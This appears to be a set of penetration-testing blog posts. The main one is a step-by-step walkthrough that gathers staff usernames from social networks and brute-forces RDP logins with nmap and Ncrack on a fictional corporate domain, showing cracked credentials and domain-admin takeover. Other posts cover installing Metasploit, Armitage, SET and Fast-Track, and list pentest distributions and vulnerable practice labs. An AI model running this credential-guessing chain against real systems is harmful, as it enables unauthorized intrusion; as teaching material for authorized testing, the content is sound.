Eclectic Security

Photo by akeg

DISCLAIMER
All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine

Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.

jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine

Software required:

Linux machine, preferably Ubuntu.
nmap and terminal server client, sudo apt-get install tsclient nmap  build-essential checkinstall libssl-dev libssh-dev

About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .http://nmap.org/ncrack/

Installation

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering

Let’s find out what hosts in a network are up, and save them to a text list. The  regular expression will parse and extract only the ip addresses from the scan.

Nmap ping scan, go no further than determining if host is online

nmap  -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks

nmap -F -iL 192.168.56.0.txt

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying
to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.

vim my.usr

jtagle
jfeagins
hduchene
trestrepo
kmissildine

We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.

vim my.pwd

somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1

At this point we run Ncrack against the 192.168.56.10 machine.

ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.

Run the terminal server client from the Linux box

tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!

At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more.

Final remarks.

For the penetration testers: don’t give up at first hurdle, there’s always another way to break in .

For the IT staff: Lack of password policy enforcing complexity and strength lead to a disaster.

Metasploit version 3.7.0 is available for download, this new release comes with a significant number of improvements. One of the most important updates is the session management, now metasploit is capable to handle hundreds of  sessions, this come handy when running large-scale social engineering engagements. Along with this update, other long-awaited features has been added, pass-the-hash and stolen password attacks against Windows 2008 and NTLM authentication support to the Microsoft SQL Server driver are the most important. As bonus, this release is shipped with 35 new remote exploits, check it out.

Here you can see how to install Metasploit and Armitage from scratch with the postgresql support on Ubuntu 11.04.

Metasploit installation

wget  http://updates.metasploit.com/data/releases/framework-3.7.0-linux-mini.run

install the metasploit framework

chmod +x framework-3.7.0-linux-mini.run

./framework-3.7.0-linux-mini.run --help

./framework-3.7.0-linux-mini.run

#run the metasploit update

msfupdate

Postgresql and dependencies installation

apt-get install postgresql pgadmin3 libpq-dev sun-java6-plugin ruby rubygems libreadline-dev libssl-dev libpq5 ruby-dev nmap

gem install pg

#Metasploit database and a user creation

su postgres
createuser metasploit -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

createdb --owner=metasploit metasploit

#Run the msfconsole  and run the following commands
#msfconsole
msf> db_driver postgresql
msf> db_connect metasploit:metasploit@127.0.0.1:5432/metasploit

The msfrpcd must be started,

msfrpcd -f -U metasploit -P metasploit -t Basic

And now is time to start armitage:

/opt/framework-3.7.0/msf3/armitage

Please check the correct postgresql credential, and press connect.

User: metasploit
Password: metasploit
DB connect string: metasploit:metasploit@127.0.0.1/metasploit

In a in a couple of seconds Armitage  should appear.

On Armitage, go to Hosts > Nmap scan > Intense Scan > Input a subnet of interest and happy hunting !

Note: In case you get the error: The address is already in use (0.0.0.0:55553) , please check the process that is keeping the port 55553 busy. You can do it easily running the command lsof -i :55553 .

COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
.ruby.bin 5538 root    4u  IPv4 154865      0t0  TCP *:55553 (LISTEN)

At this point you need to kill the process by his own PID, in this case kill -9 5538, and restart again the msfrpcd with “msfrpcd -f -U metasploit -P metasploit -t Basic”

This is a selection of books that every pen tester or infosec person need to have on the shelf. Other valuable books are available on the topic, but this are my favorite.  A particular mention goes to the guys behind the Social Engineering framework project and the related book, for their invaluable work on pwning humans. Happy reading and Hacking !

BackTrack 4: Assuring Security by Penetration Testing

BackTrack 4: Assuring Security by Penetration Testing is a fully focused, structured book providing guidance on developing practical penetration testing skills by demonstrating the cutting-edge hacker tools and techniques in a coherent step-by-step strategy. It offers all the essential lab preparation and testing procedures to reflect real-world attack scenarios from your business perspective in today’s digital age. www.packtpub.com

Social Engineering: The Art of Human Hacking

Social Engineering: The Art of Human Hacking has been unanimously voted as the official book on social engineering. Based on the Web’s first official Framework for Social Engineers, this book delves into aspects of human thinking that has not been discussed in previous social engineering books. Many readers have stated it should be used in college as a text book on both human vulnerabilities and psychology. With in depth discussions into body language, hand gestures, the scientific part of NLP and microexpressions Social Engineering: The Art of Human Hacking has been dubbed a “seminal work” in the infosec community. www.social-engineer.com

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab

Thomas Wilhelm has delivered pen testing training to countless security professionals and now through the pages of this book you can benefit from his years of experience as a professional penetration tester and educator. After reading this book you will be able to create a personal penetration test lab that can deal with real-world vulnerability scenarios.

Penetration testing is the act of testing a network to find security vulnerabilities before they are exploited by phishers, digital piracy groups, and countless other organized or individual malicious hackers. The material presented will be useful to beginners all the way through to advanced practitioners. www.syngress.com

Penetration test is an evaluation method to asses computers, systems or networks vulnerabilities and exploit them in order to  measure the impact of the flaws to the system under testing. Different testing frameworks and methodologies exist to help infosec people to choose the best strategy to conduct a successful penetration test. Here is a list of the most widely used methodologies. Enjoy !!!

ISSAF

The ISSAF is OISSG’s flagship project. It is an effort to develop an end-to-end framework for security assessment. The ISSAF aims to provide a single point of reference for professionals involved in security assessment; it reflects and addresses the practical issues of security assessment. The penetration testing framework.

OSSTMM – Open Source Security Testing Methodology Manual

The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-reviewed methodology for performing security tests and metrics. The OSSTMM test cases are divided into five channels (sections) which collectively test: information and data controls, personnel security awareness levels, fraud and social engineering control levels, computer and telecommunications networks, wireless devices, mobile devices, physical security access controls, security processes, and physical locations such as buildings, perimeters, and military bases. OSSTMM web page.

OWASP

The Open Web Application Security Project (OWASP) is an open-source application security project. The OWASP community includes corporations, educational organizations, and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies. OWASP web page.

Just a few hours ago a new version of The Social-Engineer Toolkit (SET) was released. This version is called “Artillery Edition”, and some major changes are, a completely custom interactive SET shell and RATTE a HTTP tunneling blowfish encrypted payload. Also a new attack vector including the wireless attack vector which will setup a rogue access point, spoof DNS, and launch the different SET attack vectors. If you are using SET from Backtrack, you can upgrade it following this few steps.

Log in to Backtrack:

#cd /pentest/exploits/SET/

#./set-update

Please wait until the update is finished, and run

#./set

Have fun!!!

Linux is widely used in many areas and applications, one of those is security, precisely in the Penetration Testing and network/system assessment. Along with the robustness and stability, the easy customization of the system allow the creation of custom made distribution with the favorite security tools. I hope this list is useful to find your security linux distribution. (tnx to www.pentestit.com for some links)- If your prefered Pentest/Security linux distribution isn’t listed, please contact me.

 NodeZero
NodeZero is Ubuntu based linux designed as a complete system which can also be used for penetration testing. NodeZero uses Ubuntu repositories so your system will be always up to date. The system setup is basic and it’s primarly designed for disk installation and customization as you want. With NodeZero comes around 300 tools for penetration testing and set of basic services which are needed in penetration testing. Also we are preparing a repository of pentest tools so your system will be up to date at all time. http://netinfinity.org

backtrack-linux
backtrack-linux.org, is the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. www.backtrack-linux.org

gnacktrack
GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it’s very similar but based on the much loved GNOME! www.gnacktrack.co.uk

Samurai Web Testing Framework
The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test. Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test. samurai.inguardians.com

Live Hacking CD
Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu this ‘Live CD” runs directly from the CD and doesn’t require installation on your hard-drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders. www.livehacking.com/live-hacking-cd

Network Security Toolkit
Is bootable ISO live CD/DVD (NST Live)  based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. http://www.networksecuritytoolkit.org/nst/

Pentoo
Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit livecd. It features packet injection patched wifi drivers, GPGPU cracking software[2], and lots of tools for penetration testing and security assessment. http://www.pentoo.ch

OWASP Live CD
OWASP Live CD is a project that collects some of the best open source security projects in a single CD. Web developers, testers and security professionals can boot from this Live CD and have access to a full security testing suite. This allows its users to test for various security issues in web applications and web sites. http://appseclive.org

Arudius
Arudius is a Linux live CD with tools for penetration testing and vulnerability analysis. A so-called “Linux live CD” is essentially a Linux operating system that is bootstrapped and run directly from a standard CD-ROM. This allows for improved portability of the operating system and for running a variety of Linux software on almost any physical system without affecting the host operating system installed on the hard disk. This is the concept that Arudius exploits as well. Currently, Arudius features more than 140 different security tools and packages. www.tdisecurity.com/tdi-labs/arudius.htm

WeakNet
WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME. http://weaknetlabs.com/main/

BackBox
BackBox is a Linux distribution based on Ubuntu Lucid 10.04 LTS developed to perform penetration tests and security assessments. Designed to be fast, easy to use and to provide a minimal yet complete desktop environment thanks to its own software repositories always been updated to the last stable version of the most known and used ethical hacking tools. www.backbox.org/public/

Matriux
Matriux is a fully featured security distribution consisting of a bunch of powerful, open source and free tools that can be used for various purposes including, but not limited to, penetration testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system. With Matriux, you can turn any system into a powerful penetration testing toolkit, without having to install any software into your hardisk. Matriux is designed to run from a Live environment like a CD / DVD or USB stick or it can easily be installed to your hard disk in a few steps. Matriux also includes a set of computer forensics and data recovery tools that can be used for forensic analysis and investigations and data retrieval. http://www.matriux.com

Secmic
Secmic is a live Linux security distribution that may be used by security professionals or for educational purposes. It is free to download, and always will be. It comprises over 200 security oriented open source applications and maintains Ubuntu/Kubuntu update compatibility; meaning you will be able to receive security updates directly from the Ubuntu/Kubuntu repositories. b43 / wl hybrid compatibility is included with this Remastersys backup. http://sourceforge.net/p/secmic/home//index.html

Security tools distribution
STD is a Linux-based Security Tool. Actually, it is a collection of hundreds if not thousands of open source security tools. It’s a Live Linux Distro, which means it runs from a bootable CD in memory without changing the native operating system of the host computer. Its sole purpose in life is to put as many security tools at your disposal with as slick an interface as it can.  http://s-t-d.org

NetSecL
NetSecL Linux is by default with hardened configuration leaving the distribution at a security level where it is still usable and providing the tools needed to test your security. GrSecurity and it’s firewall are features that makes the distribution unique along with specially compiled packages:Amap, Ettercap, Hydra, Kismet, Nessus, Nmap, Metasploit, PADS. http://netsecl.linuxfreedom.com

VAST
VAST is a VIPER Lab live distribution that contains VIPER developed tools such as UCsniff, videojak, videosnarf and more. Along with VIPER tools and other essential VoIP security tools, it also contains tools penetration testers utilize such as Metasploit, Nmap, and Hydra.This distribution is a work in progress. If you would like to see a tool or package included please feel free to suggest them and I will do what I can to make it happen. http://vipervast.sourceforge.net

Blackbuntu CE 0.1
Linux Penetration Testing Tools Box Based on Ubuntu 10.10 which was specially designed for security training students and practitioners of information security. www.blackbuntu.com

Katana
Katana is a portable multi-boot security suite which brings together many of today’s best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Able, and many more. www.hackfromacave.com/katana.html

Photo by: extraketchup

In this post I’m going to present some useful resources to learn about penetration testing and where to use exploitation tools and techniques in a safe and legal environment. This list contain a set of  deliberately insecure LiveCDs, Virtual machines and applicarions designed to be used as targets for enumeration, web exploitation, password cracking and reverse  engineering.

If you have other links/distribution/virtual machines, please leave a comment.

List updated on 13/9/2011

UltimateLAMP

UltimateLAMP is a Ubuntu VM  running vulnerable services and containing weak accounts.

The UltimateLAMP VM runs the following services:Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)

UltimateLAMP download

webgoat

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

http://www.owasp.org

Holynix
Similar to the de-ice Cd’s and pWnOS, holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example.
http://pynstrom.net/index.php?page=holynix.php

WackoPicko

WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found: http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf

https://github.com/adamdoupe/WackoPicko

De-ICE PenTest LiveCDs
The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Metasploitable

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Owaspbwa
Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications.
http://code.google.com/p/owaspbwa/

Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
http://www.mavensecurity.com/web_security_dojo/

Lampsecurity
LAMPSecurity training is designed to be a series of vunlerable virtual machine images along with complementary documentation designed to teach linux,apache,php,mysql security.
http://sourceforge.net/projects/lampsecurity/files/

Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
www.dvwa.co.uk

Hacking-Lab
This is the Hacking-Lab LiveCD project. It is currently in beta stadium. The live-cd is a standardized client environment for solving our Hacking-Lab wargame challenges from remote.
http://www.hacking-lab.com/hl_livecd/

Moth
Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
http://www.bonsai-sec.com/en/research/moth.php

Exploit kb vulnerable web app
exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques This is a fully functional web site with a content management system based on fckeditor. You can download it as source code or a pre configured.
http://sourceforge.net/projects/exploitcoilvuln/

Gruyere

This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you’ll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you’ll learn the following:
How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution. To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

http://google-gruyere.appspot.com/

Damn Vulnerable Linux (DVL)
Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
http://www.damnvulnerablelinux.org

pWnOS
pWnOS is on a “VM Image”, that creates a target on which to practice penetration testing; with the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points

http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html

http://www.krash.in/bond00/pWnOS%20v1.0.zip

Virtual Hacking Lab
A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats.
http://sourceforge.net/projects/virtualhacking/files/

Badstore
Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure.
http://www.badstore.net/

BodgeIt Store

The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.

http://code.google.com/p/bodgeit/

Hackademic Challenges

The OWASP Hackademic Challenges , is an open source project that can be used to test and improve one’s knowledge of information system and web application security. The OWASP Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe, controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker’s perspective.

www.hackademic.eu

OWASP Vicnum Project

A flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’ . Play the game at http://vicnum.ciphertechs.com

https://sourceforge.net/projects/vicnum/

Stanford SecuriBench

Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.

http://suif.stanford.edu/~livshits/securibench/

Kioptrix

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).
The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

http://www.kioptrix.com/blog/?page_id=135

hackxor

Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc

http://hackxor.sourceforge.net

Fast-Track is automated penetration testing suite developed by David Kennedy. This security suite help the penetration tester to identify and exploit servers using  various techniques. Combining the power of Metasploit Framework and the automation of the attacks, all the pen test process will result effective and time saving (where it’s OK to finish under 3 minutes). On the attempt to install Fast-Track 4.0 on ubuntu 10.04 I come across a missing python package issue, the package called pymills-3.4.tar.gz isn’t available from the location configured in the setup file. The workaround is to comment the line 80 an 81 of the setup.py file, and download manually the pymills package. Here you can find the instructions to install successfully Fast-Track 4.0 .

apt-get install subversion
svn co http://svn.thepentest.com/fasttrack/
cd fasttrack/
python setup.py install

Would you like to attempt all dependancies, yes or no: yes

tar: pymills-3.4.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
mv: cannot stat `pymills-3.4′: No such file or directory
cd: 1: can’t cd to pymills/

Comment out the lines 80 and 81

# subprocess.Popen(‘wget http://pypi.python.org/packages/source/p/pymills/pymills-3.4.tar.gz;tar
-zxvf pymills-3.4.tar.gz;mv pymills-3.4 pymills;cd pymills/; python setup.py install’, shell=True).wait()
# subprocess.Popen(‘rm -rf pymills; rm -rf pymills-3.4.tar.gz’, shell=True).wait()

Download manually the missing package

wget http://pypi.inqbus.de/pymills/pymills-3.4.tar.gz

Uncompress and install pymills

tar xvfz pymills-3.4.tar.gz
mv pymills-3.4 pymills
cd  pymills
python setup.py install

Processing dependencies for pymills==3.4
Finished processing dependencies for pymills==3.4

Now you can rerun the Fast Track installation

python setup.py install

Would you like to attempt all dependencies, yes or no: yes

***********************************************
******* Performing dependency checks… *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***
Run Fast Track with:  python fast-track.py -i

and Lets pop a box . Video Fast-Track ShmooCon 2009